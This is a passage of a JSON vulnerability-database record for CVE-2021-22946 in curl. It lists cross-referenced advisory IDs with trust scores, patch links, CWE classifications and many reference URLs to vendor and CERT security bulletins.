"id": "165337",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165135",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164740",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "165209",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164948",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "170303",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "164220",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021111512",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021101006",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021092301",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062007",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022011905",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022071832",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042261",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091514",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031433",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021110316",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091715",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022022222",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021091601",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031104",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166714",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "164172",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "169318",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3260",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4266",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3215",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4172",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3878",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3934",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3979",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1025",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3658",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0245",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4095",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3022",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3392",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1637",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1837",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3119.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3349",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3119",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.3146",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4280",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-381420",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-22946",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "165631",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166319"
},
{
"db": "PACKETSTORM",
"id": "166112"
},
{
"db": "PACKETSTORM",
"id": "164220"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "164993"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"id": "VAR-202109-1790",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:30:44.639000Z",
"patch": {
"_id": null,
"data": [
{
"title": "HAXX Haxx curl Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=178532"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-22946 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-22946"
},
{
"db": "CNNVD",
"id": "CNNVD-202109-997"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-319",
"trust": 1.1
},
{
"problemtype": "CWE-325",
"trust": 1.0
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381420"
},
{
"db": "NVD",
"id": "CVE-2021-22946"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.3,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20211029-0003/"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220121-0008/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213183"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2022/dsa-5197"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/mar/29"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202212-01"
},
{
"trust": 1.7,
"url": "https://hackerone.com/reports/1334111"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2021/09/msg00022.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2022/08/msg00017.html"
},
{
"trust": 1.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
},
{
"trust": 1.0,
"url": "https://access.redhat.com/security/cve/cve-2021-22946"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/apoak4x73ejtaptsvt7irvdmuwvxnwgd/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rwlec6yvem2hwubx67sdgpsy4cqb72oe/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0245"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042261"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3349"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170303/gentoo-linux-security-advisory-202212-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021111512"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165337/red-hat-security-advisory-2021-5191-02.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/curl-man-in-the-middle-via-protocol-downgrade-36418"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3392"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6510176"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4280"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022022222"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3119"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3878"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021110316"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164948/red-hat-security-advisory-2021-4618-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062007"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169318/debian-security-advisory-5197-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164172/ubuntu-security-notice-usn-5079-2.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166714/red-hat-security-advisory-2022-1354-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166319/apple-security-advisory-2022-03-14-4.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4095"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4172"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4266"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1837"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1637"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101006"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164740/red-hat-security-advisory-2021-4059-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164220/ubuntu-security-notice-usn-5079-3.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6527796"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091514"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213183"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091715"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3215"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3022"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165135/red-hat-security-advisory-2021-4914-06.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071832"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165209/red-hat-security-advisory-2021-5038-04.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031433"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1025"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166112/red-hat-security-advisory-2022-0635-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3979"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3658"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022011905"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021092301"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3934"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021091601"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165099/red-hat-security-advisory-2021-4848-07.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165053/red-hat-security-advisory-2021-4766-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164993/red-hat-security-advisory-2021-4628-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3119.2"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3260"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-22947"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3733"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33938"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33929"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33928"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33930"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-37750"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.2,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3948"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q3/167"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-22946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3575"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30758"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30665"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30689"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30682"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-18032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1801"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1765"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20847"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-5785"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1788"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5727"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30744"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21775"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36241"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30797"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22609"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4173"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22612"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22610"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4136"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22616"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4192"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46059"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0156"
},
{
"trust": 0.1,
"url": "https://support.apple.com/downloads/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0158"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22613"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4193"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30918"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22600"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22599"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4166"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0128"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22597"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22611"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4187"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22582"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213183."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0635"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5079-3"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.16"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5079-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/1944120"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3757"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
